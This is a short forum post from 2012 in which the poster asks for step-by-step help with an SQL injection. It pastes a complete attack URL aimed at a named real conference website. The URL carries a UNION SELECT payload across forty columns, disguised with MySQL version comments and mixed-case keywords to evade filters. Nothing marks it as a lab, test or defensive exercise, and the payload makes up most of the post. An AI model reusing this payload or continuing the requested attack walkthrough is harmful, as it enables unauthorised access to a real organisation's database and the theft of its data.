Re: how to inject when "order by" cann't be used?
Date: June 04, 2012 11:21PM
Thanks! Can you tell me how to inject this SQLi step by step?
I'm sorry that I could get the database_name.
http://www.eera-ecer.de/index.php?cHash=276ee7bb415ca2b6042f87cace6aa3e3&id=421&no_cache=1&Action=showContributionDetail&conferenceUid=1&contributionUid=9999.99' /*!UNioN*/ All /*!SelECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 aNd 'a'='a +--+/